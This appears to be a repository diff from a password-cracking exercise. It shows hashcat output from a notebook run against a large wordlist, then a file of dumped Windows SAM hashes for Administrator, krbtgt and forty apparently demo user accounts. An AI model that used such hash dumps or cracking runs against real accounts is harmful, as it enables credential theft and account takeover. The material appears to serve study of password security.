"Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates\n",
|
||||||
|
"Rules: 64\n",
|
||||||
|
"\n",
|
||||||
|
"Applicable optimizers applied:\n",
|
||||||
|
"* Optimized-Kernel\n",
|
||||||
|
"* Zero-Byte\n",
|
||||||
|
"* Precompute-Init\n",
|
||||||
|
"* Meet-In-The-Middle\n",
|
||||||
|
"* Early-Skip\n",
|
||||||
|
"* Not-Salted\n",
|
||||||
|
"* Not-Iterated\n",
|
||||||
|
"* Single-Salt\n",
|
||||||
|
"* Raw-Hash\n",
|
||||||
|
"\n",
|
||||||
|
"Watchdog: Temperature abort trigger set to 90c\n",
|
||||||
|
"\n",
|
||||||
|
"INFO: Removed 27 hashes found in potfile.\n",
|
||||||
|
"\n",
|
||||||
|
"Host memory required for this attack: 983 MB\n",
|
||||||
|
"\n",
|
||||||
|
"Dictionary cache hit:\n",
|
||||||
|
"* Filename..: /content/wordlists/hashesorg2019\n",
|
||||||
|
"* Passwords.: 1279729109\n",
|
||||||
|
"* Bytes.....: 13733214816\n",
|
||||||
|
"* Keyspace..: 81902662976\n",
|
||||||
|
"\n",
|
||||||
|
"\u001b[33mCracking performance lower than expected?\u001b[0m\n",
|
||||||
|
"\u001b[33m\u001b[0m\n",
|
||||||
|
"\u001b[33m* Update your backend API runtime / driver the right way:\u001b[0m\n",
|
||||||
|
"\u001b[33m https://hashcat.net/faq/wrongdriver\u001b[0m\n",
|
||||||
|
"\u001b[33m\u001b[0m\n",
|
||||||
|
"\u001b[33m* Create more work items to make use of your parallelization power:\u001b[0m\n",
|
||||||
|
"\u001b[33m https://hashcat.net/faq/morework\u001b[0m\n",
|
||||||
|
"\u001b[33m\u001b[0m\n",
|
||||||
|
"[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => "
|
||||||
|
],
|
||||||
|
"name": "stdout"
|
||||||
|
}
|
||||||
|
]
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
}
|
}
|
|
@ -0,0 +1,45 @@
|
||||||
|
Administrator:500:111f37ed915c5716aad3b435b51404ee:eb37f9cd74303274cb923442a7348ef4:::
|
||||||
|
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
|
||||||
|
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:422feb7ef3b8cbea98bf9f0f76a50d81:::
|
||||||
|
ADDEMO$:1003:aad3b435b51404eeaad3b435b51404ee:d5d1a3d8e2ee4032ec4831c9f9342309:::
|
||||||
|
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f031bf1f16bba6f9de84dffcc164e0f8:::
|
||||||
|
user01:1106:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
|
||||||
|
user02:1107:aad3b435b51404eeaad3b435b51404ee:e550853afc9a68106d73fd6680b25604:::
|
||||||
|
user03:1108:56c94ea187dbb8d6d4b8a9676de6053e:9aeae4ad385c29a8d3e25a2032df95ec:::
|
||||||
|
user04:1109:58ee1ecfcb1952c1aad3b435b51404ee:2a54f9c00701830e44923a19eea7df62:::
|
||||||
|
user05:1110:22d8afdd59cc02d1aad3b435b51404ee:336413710df33e5d6ef4ba82ba762543:::
|
||||||
|
user06:1111:843201b3eec511e619d76dfe3931be22:8810b6cff094d7bbfa9254a47e460e8c:::
|
||||||
|
user07:1112:d0d0b0a89785fea7dacc48edf1058ae1:d10107259670c218d8389bb05a6ca9a5:::
|
||||||
|
user08:1113:eb9fdbf6dde9d8a3c3f5ba53c6ea977d:81ed9d39c208fb710f16fd01df2c5ea3:::
|
||||||
|
user09:1114:ee3c975e9312263ac2265b23734e0dac:0d870c8d2ed66211a6cd19b6c8c6939a:::
|
||||||
|
user10:1115:e69e57fcbfc3742627bcbf149915a329:c1d5ff9561074a64e8164745f7e057a3:::
|
||||||
|
user11:1116:aad3b435b51404eeaad3b435b51404ee:125fee170ce858738fc08d61291174ed:::
|
||||||
|
user12:1117:3c152122664981d07a01665eb2eb6c14:3081116936973f2a1019178a085e77cd:::
|
||||||
|
user13:1118:aad3b435b51404eeaad3b435b51404ee:3f77a049f85d9ecb089313d68dc64796:::
|
||||||
|
user14:1119:6595863b3f65214eaad3b435b51404ee:7f5ab070d31e61251ab4ef78b6601941:::
|
||||||
|
user15:1120:8dfa87789573aa6caad3b435b51404ee:0794f987708fd36dc158c3435d1e9d65:::
|
||||||
|
user16:1121:bfa8b0f05b2ce944158759f68c114883:f85bbc519f1d4b9453d0d316d2f43efd:::
|
||||||
|
user17:1122:63aa06ca844a0123aad3b435b51404ee:5bd6fddd235507a2baf82843b6174b4e:::
|
||||||
|
user18:1123:aad3b435b51404eeaad3b435b51404ee:8d15a7e3fe3271b73180de20f9532111:::
|
||||||
|
user19:1124:078198d4eefc6c55aad3b435b51404ee:c09c4e921a0f7763e22aa5f38d73016a:::
|
||||||
|
user20:1125:44f388db34bb96628358f3d2c80c1dc5:9180c11efd4cb6149557f59b0cf80573:::
|
||||||
|
user21:1126:fdcfc2afb2d1be34aad3b435b51404ee:adc5df4b1f4a1b2501bbeef236f5be92:::
|
||||||
|
user22:1127:9fdfa4280126e140aad3b435b51404ee:2a3d0e353eadfb8c7b5d7d503efad47d:::
|
||||||
|
user23:1128:b273d8f0d4cb5bbcaad3b435b51404ee:b6c0168748dcdba30141914c959d9f8c:::
|
||||||
|
user24:1129:6d91129363e71245aad3b435b51404ee:e14af367857363b0f16418bcce9f96b9:::
|
||||||
|
user25:1130:9ad12257392cdacaaad3b435b51404ee:c57128805cc3e445a338126080ce52bb:::
|
||||||
|
user26:1131:12bd073e0404ed39aad3b435b51404ee:024b7f87b902332ac1369f2fd1a1d4e9:::
|
||||||
|
user27:1132:d12e81eacd737b89aad3b435b51404ee:23f8c70f8c51c5535e4ef372ffe9500a:::
|
||||||
|
user28:1133:adfc3aa0a57f3d1e944e2df489a880e4:458d16d08f6ba7c5c61cd3850b704015:::
|
||||||
|
user29:1134:5971713f415d2ff41104594f8c2ef12b:85ec40bb1fadfcd4f1cdd8f5c745338a:::
|
||||||
|
user30:1135:9ede745407ca42b2036d85e885962cfa:584c3288cdb9249191d01028fc3c1d06:::
|
||||||
|
user31:1136:3ceb8cc097f4b3bc274d6a66ff41a32b:a474953d36f287fefc73f8917ca27290:::
|
||||||
|
user32:1137:863a6a296d3d379888d84c068ac05e0a:80fadb7eb493333387c36c3a30a86a9c:::
|
||||||
|
user33:1138:e7c148e3c455aa1f8138c5e16c20cfc5:236ff73b5ec46c68c37d27d51bd4fa8f:::
|
||||||
|
user34:1139:c8e4acdacab3b81243b673bc86137536:2fce06c6e6303f0850416dfe57f809ac:::
|
||||||
|
user35:1140:aad3b435b51404eeaad3b435b51404ee:7b7b36c886e37d0a569de1eac512cf89:::
|
||||||
|
user36:1141:aad3b435b51404eeaad3b435b51404ee:4626a36dd0eccfcf71e13868990aaada:::
|
||||||
|
user37:1142:aad3b435b51404eeaad3b435b51404ee:c38307aa05d879e26becaa8156421571:::
|
||||||
|
user38:1143:aad3b435b51404eeaad3b435b51404ee:d97004b9867c89bdae80a4673d45ac0d:::
|
||||||
|
user39:1144:aad3b435b51404eeaad3b435b51404ee:b7ea6aa900be567c319f60add47db080:::
|
||||||
|
user40:1145:aad3b435b51404eeaad3b435b51404ee:28a198884cf2e2f4a7982333e89bd344:::
|
Loading…
Reference in New Issue